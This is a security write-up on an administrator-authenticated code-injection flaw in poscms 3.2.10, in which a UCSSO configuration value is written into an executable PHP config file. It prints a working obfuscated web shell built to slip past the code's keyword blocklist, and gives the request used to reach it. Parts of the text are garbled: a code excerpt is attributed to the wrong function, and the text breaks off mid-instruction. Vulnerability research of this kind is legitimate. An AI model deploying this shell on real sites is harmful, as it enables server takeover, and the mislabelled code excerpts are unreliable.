poscms 3.2.10
You need to be logged in as an administrator.
In the file diy\module\member\controllers\admin\Setting.php, in the function 'index':
1. public function index() {
2.
3. $page = (int)$this->input->get('page');
4. $result = 0;
5.
6. if (IS_POST) {
7. $post = $this->input->post('data');
8. $page = (int)$this->input->post('page');
9. // 规则判断
10. if (emptyempty($post['regfield'])) {
11. $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
12. } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
13. $this->admin_msg('开启邮件审核后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
14. } elseif (!in_array('email', $post['regfield']) && $post['ucenter'] == 1) {
15. $this->admin_msg('开启Ucenter后,注册字段必须选择【邮箱】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
16. } elseif (!in_array('phone', $post['regfield']) && $post['regverify'] == 3) {
17. $this->admin_msg('开启手机验证码审核后,注册字段必须选择【手机】,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
18. } elseif ($post['ucsso'] && $post['ucenter']) {
19. $this->admin_msg('Ucenter和UCSSO不能同时开启', dr_url('member/setting/index', array('page'=> $page)), 0, 9);
20. }
21. $this->member_model->member($post);
22. $data = $post; //用户的输入
23. $cache = $this->member_model->cache(); //进入对应的cache()函数
24. $result = 1;
Line 23 calls member_model->cache(), so we look at the file diy\module\member\models\Member_model.php
and, in the function cache, we see:
1. $page = (int)$this->input->get('page');
2. $result = 0;
3.
4. if (IS_POST) {
5. $post = $this->input->post('data');
6. $page = (int)$this->input->post('page');
7. // 规则判断
8. if (empty($post['regfield'])) {
9. $this->admin_msg('至少需要选择一个注册字段,否则注册系统会崩溃', dr_url('member/setting/index', array('page'=> $page)), 0, 9);//这里需要注意
10. } elseif (!in_array('email', $post['regfield']) && $post['regverify'] == 1) {
11. 。。。。。。。。。。。。。。。。。。。。。。略过
12. // 更新UCSSO配置
13. if ($cache['setting']['ucsso']) {
14. $ucsso = htmlspecialchars_decode($cache['setting']['ucssocfg']); //vul
15. if (strpos($ucsso, 'eval') !== false
16. || strpos($ucsso, '_POST') !== false
17. || strpos($ucsso, '_REQUEST') !== false
18. || strpos($ucsso, '_GET') !== false) {
19. return;
20. }
21. file_put_contents(WEBPATH.'api/ucsso/config.php', $ucsso , LOCK_EX); //vul
22. }
23.
24. $this->ci->clear_cache('member');
25. $this->dcache->set('member', $cache);
26.
27. return $cache;
28. }
Because the user controls the value of $cache['setting']['ucssocfg'], line 21 writes that attacker-controlled content into the file api/ucsso/config.php, which is a PHP file executed by the application.
The substring blocklist on lines 15-18 does not prevent this; the proper fix is to stop writing administrator-supplied text into an executable .php file and store the configuration as data (e.g. JSON) instead.
This allows an attacker with administrator access to get a shell.
一.
The shell payload used in this write-up is:
<?php
error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
After it is posted, the file api\ucsso\config.php contains that code.
The shell can then be reached by requesting http://127.0.0.1:8888/index.php?c=myndtt&m=index
Note: if it does not succeed, the package you posted may be missing the 'regfield' field; add it
like this: